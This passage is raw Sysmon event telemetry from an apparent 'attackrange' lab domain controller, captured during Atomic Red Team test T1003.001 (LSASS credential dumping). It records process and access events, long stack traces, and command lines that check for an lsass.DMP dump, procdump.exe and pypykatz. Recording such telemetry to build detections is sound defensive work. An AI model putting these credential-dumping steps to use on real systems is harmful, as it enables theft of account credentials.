4a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {cmd /c \""if not exist %%tmp%%\lsass.DMP (exit /b 1)\""} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.686{4DB9351A-A32C-60D3-3B06-00000000CF01}4352ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.623{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.623{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.577{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.577{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:04.545{4DB9351A-A32C-60D3-3B06-00000000CF01}4352\PSHost.132689562044570727.4352.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.530{4DB9351A-A32C-60D3-3B06-00000000CF01}4352ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lba3ra0v.mzz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.530{4DB9351A-A32C-60D3-3B06-00000000CF01}4352ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_k25nh1gu.i25.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.514{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_k25nh1gu.i25.ps12021-06-23 21:10:04.514 10341000x800000000000000025119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.452{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.346{4DB9351A-A32D-60D3-4706-00000000CF01}5380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.280{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=85598C0D5AF3B460E88C0DF78CD7617C,SHA256=CFA377A67CF13D707F73DBE8A92D4DB306A8A1B3124A632D7AEF10E83D663EA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.248{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.233{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.233{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.233{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078
deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.245{4DB9351A-A32D-60D3-4606-00000000CF01}6568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pypykatz -h >nul 2>&1 && exit /b %%errorlevel%%" 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 